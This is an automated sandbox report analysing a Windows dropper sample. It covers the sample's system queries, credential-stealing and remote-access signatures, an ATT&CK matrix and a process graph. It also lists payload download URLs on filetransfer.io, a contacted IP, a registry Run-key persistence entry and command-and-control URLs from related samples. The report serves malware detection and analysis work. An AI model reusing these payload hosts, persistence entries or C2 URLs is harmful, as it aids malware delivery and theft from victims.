              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.588968123.000000000375D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.582069242.00000000025B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.588726447.0000000003735000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.588968123.000000000375D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.582069242.00000000025B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.588726447.0000000003735000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe PID: 5016, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.588968123.000000000375D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.582069242.00000000025B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.588726447.0000000003735000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid Accounts1
              PowerShell
              1
              Registry Run Keys / Startup Folder
              11
              Process Injection
              1
              Masquerading
              11
              Input Capture
              11
              Security Software Discovery
              Remote Services11
              Input Capture
              Exfiltration Over Other Network Medium11
              Encrypted Channel
              Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
              Registry Run Keys / Startup Folder
              1
              Disable or Modify Tools
              LSASS Memory1
              Process Discovery
              Remote Desktop Protocol1
              Archive Collected Data
              Exfiltration Over Bluetooth1
              Ingress Tool Transfer
              Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)21
              Virtualization/Sandbox Evasion
              Security Account Manager21
              Virtualization/Sandbox Evasion
              SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
              Non-Application Layer Protocol
              Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)11
              Process Injection
              NTDS1
              Application Window Discovery
              Distributed Component Object ModelInput CaptureScheduled Transfer13
              Application Layer Protocol
              SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information
              LSA Secrets1
              Remote System Discovery
              SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.common1
              Hidden Users
              Cached Domain Credentials1
              System Network Configuration Discovery
              VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup Items2
              Obfuscated Files or Information
              DCSync1
              File and Directory Discovery
              Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job12
              Software Packing
              Proc Filesystem12
              System Information Discovery
              Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 756122 Sample: SecuriteInfo.com.Win32.Drop... Startdate: 29/11/2022 Architecture: WINDOWS Score: 100 38 s23.filetransfer.io 2->38 40 filetransfer.io 2->40 46 Snort IDS alert for network traffic 2->46 48 Malicious sample detected (through community Yara rule) 2->48 50 Antivirus detection for dropped file 2->50 52 8 other signatures 2->52 8 SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe 16 6 2->8         started        signatures3 process4 dnsIp5 42 filetransfer.io 188.114.96.3, 443, 49695, 49696 CLOUDFLARENETUS European Union 8->42 44 s23.filetransfer.io 188.114.97.3, 443, 49697, 49700 CLOUDFLARENETUS European Union 8->44 34 C:\Users\user\AppData\...\Mqombsglp.exe, PE32 8->34 dropped 36 C:\Users\...\Mqombsglp.exe:Zone.Identifier, ASCII 8->36 dropped 54 Encrypted powershell cmdline option found 8->54 13 cmd.exe 1 8->13         started        16 cmd.exe 1 8->16         started        18 powershell.exe 16 8->18         started        20 powershell.exe 9 8->20         started        file6 signatures7 process8 signatures9 56 Uses ipconfig to lookup or modify the Windows network settings 13->56 22 conhost.exe 13->22         started        24 ipconfig.exe 1 13->24         started        26 conhost.exe 16->26         started        28 ipconfig.exe 1 16->28         started        30 conhost.exe 18->30         started        32 conhost.exe 20->32         started        process10

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe100%AviraTR/Dropper.Gen
              SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe100%Joe Sandbox ML
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Roaming\Meiilnstlz\Mqombsglp.exe100%AviraTR/Dropper.Gen
              C:\Users\user\AppData\Roaming\Meiilnstlz\Mqombsglp.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Roaming\Meiilnstlz\Mqombsglp.exe38%ReversingLabsWin32.Trojan.Generic
              SourceDetectionScannerLabelLinkDownload
              0.0.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.150000.0.unpack100%AviraHEUR/AGEN.1202479Download File
              No Antivirus matches
              SourceDetectionScannerLabelLink
              http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
              http://crl.microsoft0%URL Reputationsafe
              https://go.micro0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              http://www.microsoft.co0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              http://james.newtonking.com/projects/json0%URL Reputationsafe
              https://s23.filetransfer.io/storage/download/EmFT04AdCdjg0%Avira URL Cloudsafe
              https://s23.filetransfer.io/storage/download/1tQUp1sCtsBK0%Avira URL Cloudsafe
              http://filetransfer.io0%Avira URL Cloudsafe
              https://filetransfer.io/data-package/XK4aNvBX/download0%Avira URL Cloudsafe
              http://filetransfer.io/data-package/XK4aNvBX/download0%Avira URL Cloudsafe
              62.102.148.1580%Avira URL Cloudsafe
              https://filetransfer.io40%Avira URL Cloudsafe
              https://s23.filetransfer.io40%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              filetransfer.io
              188.114.96.3
              truefalse
                unknown
                s23.filetransfer.io
                188.114.97.3
                truefalse
                  unknown
                  NameMaliciousAntivirus DetectionReputation
                  https://s23.filetransfer.io/storage/download/EmFT04AdCdjgfalse
                  • Avira URL Cloud: safe
                  unknown
                  62.102.148.158true
                  • Avira URL Cloud: safe
                  unknown
                  https://s23.filetransfer.io/storage/download/1tQUp1sCtsBKfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://filetransfer.io/data-package/XK4aNvBX/downloadfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://filetransfer.io/data-package/XK4aNvBX/downloadfalse
                  • Avira URL Cloud: safe
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.448375536.0000000005E10000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://filetransfer.io4SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.581666022.0000000002516000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.429476801.0000000004EEB000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://crl.microsoftpowershell.exe, 00000001.00000003.358114104.00000000035E6000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.429476801.0000000004EEB000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://go.micropowershell.exe, 00000001.00000002.445374191.000000000561F000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://contoso.com/powershell.exe, 00000001.00000002.448375536.0000000005E10000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.448375536.0000000005E10000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://www.newtonsoft.com/jsonschemaSecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.591838998.0000000007200000.00000004.08000000.00040000.00000000.sdmpfalse
                          high
                          http://www.microsoft.copowershell.exe, 00000001.00000003.421845130.00000000081D1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://contoso.com/Licensepowershell.exe, 00000001.00000002.448375536.0000000005E10000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://contoso.com/Iconpowershell.exe, 00000001.00000002.448375536.0000000005E10000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://www.nuget.org/packages/Newtonsoft.Json.BsonSecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.591838998.0000000007200000.00000004.08000000.00040000.00000000.sdmpfalse
                            high
                            http://filetransfer.ioSecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.581434532.00000000024E7000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://github.com/syohex/java-simple-mine-sweeperC:SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.588968123.000000000375D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.582069242.00000000025B8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.588726447.0000000003735000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameSecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.581434532.00000000024E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.426684299.0000000004DB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.429476801.0000000004EEB000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://james.newtonking.com/projects/jsonSecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.582069242.00000000025B8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.583673856.00000000026F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://s23.filetransfer.io4SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.581861359.0000000002545000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs
                                  IPDomainCountryFlagASNASN NameMalicious
                                  188.114.97.3
                                  s23.filetransfer.ioEuropean Union
                                  13335CLOUDFLARENETUSfalse
                                  188.114.96.3
                                  filetransfer.ioEuropean Union
                                  13335CLOUDFLARENETUSfalse
                                  Joe Sandbox Version:36.0.0 Rainbow Opal
                                  Analysis ID:756122
                                  Start date and time:2022-11-29 16:53:32 +01:00
                                  Joe Sandbox Product:CloudBasic
                                  Overall analysis duration:0h 10m 32s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Sample file name:SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                  Number of analysed new started processes analysed:16
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • HDC enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Detection:MAL
                                  Classification:mal100.troj.evad.winEXE@17/8@6/2
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HDC Information:Failed
                                  HCA Information:
                                  • Successful, ratio: 99%
                                  • Number of executed functions: 86
                                  • Number of non-executed functions: 3
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • VT rate limit hit for: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe
                                  TimeTypeDescription
                                  16:55:01API Interceptor74x Sleep call for process: powershell.exe modified
                                  16:56:34AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Mqombsglp "C:\Users\user\AppData\Roaming\Meiilnstlz\Mqombsglp.exe"
                                  16:56:43AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Mqombsglp "C:\Users\user\AppData\Roaming\Meiilnstlz\Mqombsglp.exe"
                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                  188.114.97.3file.exeGet hashmaliciousBrowse
                                  • piratia.su/tmp/
                                  New PO-RJ-IN-003 - Knauf Queimados.exeGet hashmaliciousBrowse
                                  • www.oonrreward.xyz/m9ae/?F6z4=LevhYPqdwsQo7WECD6x58K9v32wKr9jEH/unqFqLIkFUX6m7L7+nio4XOLlDaWup3nHmZdjhK28JVchKAobJnM2R7Dp3tDlOSA==&mN6Hg=kRq8Chx0sXs4Nnu0
                                  D009780.exeGet hashmaliciousBrowse
                                  • bllsl1.shop/bs1/index.php
                                  https://linkprotect.cudasvc.com/url?a=https%3a%2f%2flnewmanbunnellelectric.com%2f&c=E,1,-SmOrItRkzmIjK3rKUS4lI02RvsfWzGdZ1HnCIT5Pt230osjD6mDrVCNiu4teQwo-lwx2RA8Bs1QUO7XeVgh7bu1527soTNm0HME39Y1hPc-NQmLQw,,&typo=1Get hashmaliciousBrowse
                                  • leannrest.buzz/a/
                                  FCA000200010005.PDF.exeGet hashmaliciousBrowse
                                  • www.boxgamevn.com/fqsu/?Rtp=jRKGyblX4j3XO/UHDD1bhByDxMsa9k7gvo/AYG4Y/WurN5ROIllrxzLF34/Tif+uZkj7LjnJD5yDR2xb8A98T7KcvZ+qdcLeEw==&bN9h=I48D5xR8mHbl
                                  RFQ 8525-22.exeGet hashmaliciousBrowse
                                  • www.oonrreward.xyz/m9ae/?oPK0S=0Hut_Lzp&cPkt=LevhYPqdwsQo7WECD6x58K9v32wKr9jEH/unqFqLIkFUX6m7L7+nio4XOLlDaWup3nHmZdjhK28JVchKAobUpoaQthBR9xhjQQ==
                                  Encomenda(P.O52403495-2022)INAUTOM.exeGet hashmaliciousBrowse
                                  • assaggip.cf/PWS/fre.php
                                  file.exeGet hashmaliciousBrowse
                                  • xv.yxzgamen.com/logo.png
                                  Arrival_Notice093MEDU.vbsGet hashmaliciousBrowse
                                  • www.center-me.com/b3es/
                                  SecuriteInfo.com.Win32.PWSX-gen.5291.7831.exeGet hashmaliciousBrowse
                                  • www.mensfitnesstalk.com/fqsu/?y2=dTNBrpqYyfl45l0DWGwzRvffp7Lk5FRBAdQBLPfi59LEdsyrTAH8GlhDXz9eaN7eTYpZdFI9fl5mry3LQD3aFzhIwfRH3lbw8Q==&g4p=u0GHrD5PWjVPeNT
                                  Fedex No71502.exeGet hashmaliciousBrowse
                                  • gab0r1.shop/bill2/index.php
                                  LkmBjPtGeD.exeGet hashmaliciousBrowse
                                  • www.pornblogsspider.com/do25/?jXA0=/Wzb51y89SVGfqCG0lnMwQlDM2pi7dw/6Q1VvmficV8wW0c+wfN2LTpkiK3jhfInq5+E&x48=klotx
                                  Quotation Request - 10001.exeGet hashmaliciousBrowse
                                  • www.3815ww.com/m5oe/?oB=XkQYmzIz7dd8yYIePi3dVl7VLyh43x9ItCWE0fG661NSz7uEqdWsD5sDljzEj0eBROsI0s4ekoxIrI4cXD1hS27BiN8MgInCwQ==&7ncP=7nJpTV
                                  SecuriteInfo.com.Win64.Malware-gen.22993.9755.exeGet hashmaliciousBrowse
                                  • www.consumeanalysis.com/t5ez/?3fRlvL=Fhwc0jyyGGdJ+si18QMLeDUVazfMcXVQJ3hnVVlFID01xU4pvNWwYVp4DKbx666Z0CQcWiIBNTLy9HvgIV9KxdKGEJgEMtMCbA==&l6L0I=-Zl0iRNha4wdy87
                                  Notice-228383848-9032.vbsGet hashmaliciousBrowse
                                  • www.center-me.com/b3es/
                                  Form.exeGet hashmaliciousBrowse
